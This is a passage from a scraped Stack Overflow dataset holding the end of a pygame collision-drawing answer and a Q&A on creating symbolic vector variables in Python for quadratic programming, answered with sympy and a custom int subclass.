c2.colisionL(self)\n \n def colisionL(self, l1):\n return Linea.intersect_line_line((self.x, self.y), (self.a, self.b), (l1.x, l1.y), (l1.a, l1.b))\n \n def intersect_line_line(P0, P1, Q0, Q1): \n d = (P1[0]-P0[0]) * (Q1[1]-Q0[1]) + (P1[1]-P0[1]) * (Q0[0]-Q1[0]) \n if d == 0:\n return None\n t = ((Q0[0]-P0[0]) * (Q1[1]-Q0[1]) + (Q0[1]-P0[1]) * (Q0[0]-Q1[0])) / d\n u = ((Q0[0]-P0[0]) * (P1[1]-P0[1]) + (Q0[1]-P0[1]) * (P0[0]-P1[0])) / d\n if 0 <= t <= 1 and 0 <= u <= 1:\n return P1[0] * t + P0[0] * (1-t), P1[1] * t + P0[1] * (1-t)\n return None\n\nclass Circulo:\n def __init__(self, x, y, r):\n self.x = x\n self.y = y\n self.radio = r\n self.cx = x+r\n self.cy = y+r\n\n def __str__(self):\n return f\"Circulo, (X: {self.x}, Y: {self.y}), radio: {self.radio}\"\n\n def dibujar(self, ventana):\n pg.draw.circle(ventana, \"white\", (self.cx, self.cy), self.radio, 1)\n pg.draw.line(ventana, \"white\", (self.cx+2, self.cy+2),(self.cx-2, self.cy-2))\n pg.draw.line(ventana, \"white\", (self.cx-2, self.cy+2),(self.cx+2, self.cy-2))\n\n def update(self):\n pass\n\n def colisionC(self, c2):\n return self.radio + c2.radio > sqrt(pow(self.cx - c2.cx, 2) + pow(self.cy - c2.cy, 2))\n \n def colisionL(self, L2):\n l0 = [L2.x, L2.y]\n l1 = [L2.a, L2.b]\n cp = [self.cx, self.cy]\n x1 = l0[0] - cp[0]\n y1 = l0[1] - cp[1]\n x2 = l1[0] - cp[0]\n y2 = l1[1] - cp[1]\n if sqrt(x1*x1+y1*y1) < self.radio or sqrt(x2*x2+y2*y2) < self.radio:\n return True\n\n dx = x2 - x1\n dy = y2 - y1\n dr = sqrt(dx*dx + dy*dy)\n D = x1 * y2 - x2 * y1\n discriminant = self.radio*self.radio*dr*dr - D*D\n if discriminant < 0:\n return False\n \n sign = lambda x: -1 if x < 0 else 1\n xa = (D * dy + sign(dy) * dx * sqrt(discriminant)) / (dr * dr)\n xb = (D * dy - sign(dy) * dx * sqrt(discriminant)) / (dr * dr)\n ya = (-D * dx + abs(dy) * sqrt(discriminant)) / (dr * dr)\n yb = (-D * dx - abs(dy) * sqrt(discriminant)) / (dr * dr)\n ta = (xa-x1)*dx/dr + (ya-y1)*dy/dr\n tb = (xb-x1)*dx/dr + (yb-y1)*dy/dr\n return 0 < ta < dr or 0 < tb < dr\n\nclass CreaObjects:\n def __init__(self, figs):\n self.figs = figs\n self.no_lines = 0\n self.no_circles = 0\n \n def update(self):\n if self.no_circles <70:\n r = randint(5, 104)\n creOne = Circulo(randint(0, 600 - 2*r), randint(0, 400 - 2*r), r)\n if not any(fig.colisionC(creOne) for fig in self.figs):\n self.figs.append(creOne)\n self.no_circles += 1\n \n if self.no_lines <70:\n linOne = Linea(randint(0, 700), randint(0, 500), randint(0, 700), randint(0, 500))\n 
if not any(fig.colisionL(linOne) for fig in self.figs):\n self.figs.append(linOne)\n self.no_lines += 1 \n\nclass Ventana:\n def __init__(self, Ven_Tam= (700, 500)):\n \n pg.init()\n self.ven_tam = Ven_Tam\n\n self.ven = pg.display.set_caption(\"Linea\")\n self.ven = pg.display.set_mode(self.ven_tam)\n self.figs = []\n self.reloj = pg.time.Clock()\n \n def check_events(self):\n for event in pg.event.get():\n if event.type == pg.QUIT or (event.type == pg.KEYDOWN and event.key == pg.K_ESCAPE):\n quit()\n\n def run(self):\n cirCreater = CreaObjects(self.figs)\n while True:\n self.check_events()\n cirCreater.update()\n \n self.ven.fill(pg.Color('#404040'))\n for fig in self.figs:\n fig.dibujar(self.ven)\n pg.display.flip()\n self.reloj.tick(60)\n \nif __name__ == '__main__':\n ven = Ventana()\n ven.run()\n\n"
] | [
1
] | [] | [] | [
"class",
"pygame",
"python"
] | stackoverflow_0074595968_class_pygame_python.txt |
Q:
Filling a vector with a varying amount of variables
Hey currently I'm trying to program a quadratic programming algorithm with Python.
My goal:
I want to program a function where the given parameters are one vector c and a matrix G. They are connected through the function Phi = 0.5 * (x^T * G * x) + c^T * x (x^T in this context means vector x transposed). The goal of the function is to find a vector x so that the function Phi is minimized. In order to do that, I need to perform some algebraic calculations (multiplication, transposing, and deriving the gradient of the function Phi).
My problem: I'm struggling with creating a vector that matches the dimension of the problem. I am trying to create a vector x = [x_1, x_2, x_3, ..., x_N] which contains N elements, where N varies. The elements x_N should be variables (since I want to compute them later on, but I need them 'beforehand' to calculate e.g. the gradient).
My code so far ('NoE' is equal to N+1; that's why I'm subtracting 1 in my while statement):
#filling the x-vector according to the dimension of the given problem
x = [None] * NoE  # pre-size the list so index assignment works
temp_2 = 0
while temp_2 <= (NoE - 1):
    x[temp_2] = 'x_' + str(temp_2)  # str() needed; 'x_' + temp_2 raises TypeError
    temp_2 += 1  # without this increment the loop never terminates
print(x)
The previous answer only helped me partially:
The only problem I am encountering now is that those are all strings, and I can't perform any kind of mathematical operation with them (like multiplying them by a matrix). Do you know any fix so that I can still do it with strings?
Or do you think I could use the sympy library (which would help me with future calculations)?
I'm open to any suggestion for solving this, since I don't have a lot of experience with programming in general.
Thanks in advance!
A:
Sounds like an XY problem, because I don't understand how you are going to initialize those variables. If you provide more context, I will update my answer.
If you want to have your list to contain variables or "symbols" on which you do algebraic operations, then the standard library doesn't have that, but you can use sympy:
import sympy
from sympy import symbols
### First we initialize some Symbol objects
# this does essentially what you were doing in the question, but in one line
# see list comprehensions*
symbol_names = [f'x_{i}' for i in range(NoE-1)]
# then we make them become 'Symbols'
x = symbols(symbol_names)
### Next we can do stuff with them:
# multiply the first two
expr = x[0] * x[1]
print(expr) # x_0*x_1
# evaluate the expression `expr` with x_0=3, x_1=2
res = expr.evalf(subs={'x_0':3, 'x_1':2})
print(res) # 6.00000
Even though the sympy code above answers your question as it is, I don't think that it's the best solution to the problem you were describing.
For example, you could just have a list called x and then populate it with elements:
x = []
for i in range(NoE-1):
x.append(
float(input(f'insert value x_{i}'))
)
This way x will have all the inputted elements and you can access them via x[0], x[1], and so on.
* docs.python.org/3/tutorial/datastructures.html#list-comprehensions
A:
You can create your own type (class) and implement any logic you want there:
class Vector(int):
def __new__(cls, name: str, number: int):
created_object = super().__new__(cls, number)
return created_object
def __init__(self, name, number):
self.name = name
self.number = number
# print(f'{name} is called with number={number}')
# if you want to get the same type back after a math operation,
# you'll have to implement all the magic methods like so;
## otherwise comment it out and you'll get an int result when multiplying
def __mul__(self, other):
return Vector("".join([self.name, "*",other.name]), self.number * other.number)
def __repr__(self):
return f'{self.name}: {self.number}'
v1 = Vector("v1", 3)
v2 = Vector("v2", 4)
print(v1)
print(v2)
print(v1*v2)
# int result, since __add__ is not implemented in the class
v3 = v1 + v2
print(v3)
v = [ Vector(f"v_{x}", x+1) for x in range(0,2)]
print(v)
t = [mv * v1 for mv in v]
print(t)
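For the quadratic objective from the question itself (my sketch, independent of both answers), numpy handles an N-dimensional x without symbolic variables; this assumes G is a symmetric N x N array, so the gradient is G x + c:
import numpy as np

def phi(x, G, c):
    # Phi(x) = 0.5 * x^T G x + c^T x
    return 0.5 * x @ G @ x + c @ x

def grad_phi(x, G, c):
    # valid for symmetric G; otherwise use 0.5 * (G + G.T) @ x + c
    return G @ x + c

G = np.array([[2.0, 0.0], [0.0, 4.0]])
c = np.array([-2.0, -8.0])
x = np.zeros(2)
print(phi(x, G, c))       # 0.0
print(grad_phi(x, G, c))  # [-2. -8.]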
| Filling a vector with a varying amount of variables | Hey, currently I'm trying to program a quadratic programming algorithm in Python.
My goal:
I want to program a function where the given parameters are one vector c and a matrix G. They are connected through the function Phi = 0.5 * (x^T * G * x) + c^T * x (x^T in this context means vector x transposed). The goal of the function is to find a vector x so that the function Phi is minimized. In order to do that, I need to perform some algebraic calculations (multiplication, transposing, and deriving the gradient of the function Phi).
My problem: I'm struggling with creating a vector that matches the dimension of the problem. I am trying to create a vector x = [x_1, x_2, x_3, ..., x_N] which contains N elements, where N varies. The elements x_N should be variables (since I want to compute them later on, but I need them 'beforehand' to calculate e.g. the gradient).
My code so far ('NoE' is equal to N+1; that's why I'm subtracting 1 in my while statement):
#filling the x-vector according to the dimension of the given problem
x = [None] * NoE  # pre-size the list so index assignment works
temp_2 = 0
while temp_2 <= (NoE - 1):
    x[temp_2] = 'x_' + str(temp_2)  # str() needed; 'x_' + temp_2 raises TypeError
    temp_2 += 1  # without this increment the loop never terminates
print(x)
The previous answer only helped me partially:
The only problem I am encountering now is that those are all strings, and I can't perform any kind of mathematical operation with them (like multiplying them by a matrix). Do you know any fix so that I can still do it with strings?
Or do you think I could use the sympy library (which would help me with future calculations)?
I'm open to any suggestion for solving this, since I don't have a lot of experience with programming in general.
Thanks in advance!
| [
"Sounds like an x y problem, because I don't understand how you are going to initialize those variables. If you provide more context I will update my answer.\nIf you want to have your list to contain variables or \"symbols\" on which you do algebraic operations, then the standard library doesn't have that, but you can use sympy:\nimport sympy\nfrom sympy import symbols\n\n### First we initialize some Symbol objects\n\n# this does essentially what you were doing in the question, but in one line\n# see list comprehensions* \nsymbol_names = [f'x_{i}' for i in range(NoE-1)]\n\n# then we make them become 'Symbols'\nx = symbols(symbol_names)\n\n### Next we can do stuff with them:\n\n# multiply the first two\nexpr = x[0] * x[1]\nprint(expr) # x_0*x_1\n\n# evaluate the expression `expr` with x_0=3, x_1=2\nres = expr.evalf(subs={'x_0':3, 'x_1':2})\nprint(res) # 6.00000\n\nEven though the sympy code above answer your question as it is, I don't think that it's the best solution to the problem you were describing.\nFor example you could just have a list called x and then you populate it with elements\nx = []\nfor i in range(NoE-1):\n x.append(\n float(input(f'insert value x_{i}'))\n )\n\nThis way x will have all the inputted elements and you can access them via x[0], x[1], and so on.\n\n* docs.python.org/3/tutorial/datastructures.html#list-comprehensions\n",
"You can create you own type (class) and implement any logic you want there:\nclass Vector(int):\n def __new__(cls, name: str, number: int):\n created_object = super().__new__(cls, number)\n return created_object\n\n def __init__(self, name, number):\n self.name = name \n self.number = number\n # print(f'{name} is called with number={number}')\n \n # if ypu want to get the same type after math operation\n # you'll have to implement all magics like so\n ## otherwise comment it and you'll get the result of int type on multiplying\n def __mul__(self, other):\n return Vector(\"\".join([self.name, \"*\",other.name]), self.number * other.number)\n \n def __repr__(self):\n return f'{self.name}: {self.number}'\n\nv1 = Vector(\"v1\", 3)\nv2 = Vector(\"v2\", 4)\n\nprint(v1)\nprint(v2)\n\nprint(v1*v2)\n\n# int result as it is not implemented in class\nv3 = v1 + v2\nprint(v3)\n\n\nv = [ Vector(f\"v_{x}\", x+1) for x in range(0,2)]\n\nprint(v)\n\nt = [mv * v1 for mv in v]\n\nprint(t)\n\n"
] | [
1,
0
] | [] | [] | [
"arrays",
"python",
"variables"
] | stackoverflow_0074590267_arrays_python_variables.txt |